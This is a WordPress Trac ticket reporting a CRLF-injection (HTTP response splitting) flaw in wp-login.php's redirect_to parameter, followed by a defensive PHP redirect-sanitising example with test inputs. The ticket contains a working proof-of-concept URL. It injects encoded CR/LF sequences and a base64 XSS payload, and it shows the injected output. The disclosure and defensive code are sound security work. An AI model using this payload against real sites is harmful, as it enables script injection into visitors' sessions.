[wp-trac] [WordPress Trac] #31233: HTTP Header CRLF Injection (HTTP Response Splitting) wp-login.php
WordPress Trac
noreply at wordpress.org
Wed Feb 4 17:37:10 UTC 2015
#31233: HTTP Header CRLF Injection (HTTP Response Splitting) wp-login.php
------------------------------------+-----------------------------
Reporter: roadrashtx | Owner:
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: Login and Registration | Version: 4.1
Severity: normal | Keywords:
Focuses: |
------------------------------------+-----------------------------
Our security team did some scanning of our blogs and found the following:
By using a carriage return-linefeed sequence, an attacker can add HTTP
headers to the response and completely write the body of the HTTP request.
'''Example''': http://wordpressdomain/wp-login.php?redirect_to=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&reauth=1
'''Result''': in the source code you will see the %0D %0A (URL encoded
<CR> and <LF>) is successfully injected.
<input type="hidden" name="redirect_to" value="Content-Type:
multipart/related; boundary=_AppScan
--_AppScan
Content-Location:foo
Content-Transfer-Encoding:base64
PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
" />
--
Ticket URL: <https://core.trac.wordpress.org/ticket/31233>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
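As an added illustration (not code from this ticket or from WordPress core) of the kind of filtering a redirect parameter such as `redirect_to` needs before it reaches a `Location` header or a page attribute: the function names `strip_crlf_deep` and `safe_redirect_target`, the fallback path and the allowed-host list are assumptions made for the example.

```php
<?php
// Added example, not WordPress code: sanitise a redirect target so that raw or
// percent-encoded CR/LF sequences cannot survive into a response header.

function strip_crlf_deep(string $value): string {
    // Loop until nothing changes, so nested encodings such as "%0%0dd"
    // do not reassemble into "%0d" after a single pass.
    $patterns = ['%0d', '%0a', '%0D', '%0A', "\r", "\n"];
    do {
        $before = $value;
        $value  = str_replace($patterns, '', $value);
    } while ($before !== $value);
    return $value;
}

function safe_redirect_target(string $raw, string $fallback, array $allowed_hosts): string {
    $target = strip_crlf_deep($raw);
    // Keep only characters a URL legitimately needs (drops spaces, quotes, angle brackets, ...).
    $target = preg_replace('|[^a-z0-9\-~+_.?#=&;,/:%!*\[\]()@]|i', '', $target);
    if ($target === '') {
        return $fallback;
    }
    // A site-relative path is fine; "//host/..." is protocol-relative and must be checked like an absolute URL.
    if ($target[0] === '/' && substr($target, 0, 2) !== '//') {
        return $target;
    }
    // Anything else must parse to an allowed host, otherwise fall back.
    $host = parse_url($target, PHP_URL_HOST);
    if (!is_string($host) || !in_array(strtolower($host), $allowed_hosts, true)) {
        return $fallback;
    }
    return $target;
}

// Constructed input: the redirect_to value from the report, still percent-encoded.
$raw   = 'Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-Location:foo';
$clean = safe_redirect_target($raw, '/wp-admin/', ['example.com']);

// The injected value has no host, so the sanitiser returns the fallback, and
// no CR/LF (raw or encoded) remains in what would be sent to header().
var_dump($clean);                                              // string(10) "/wp-admin/"
var_dump(strpos($clean, "\r") === false && stripos($clean, '%0d') === false); // bool(true)
var_dump(safe_redirect_target('https://example.com/wp-admin/', '/', ['example.com']));
var_dump(safe_redirect_target('//evil.example/x', '/', ['example.com']));     // string(1) "/"
```

PHP's own `header()` has refused values containing a newline since 5.1.2, so a check like this is defence in depth for the header and is what keeps the value clean when it is also echoed into the hidden `redirect_to` input shown above.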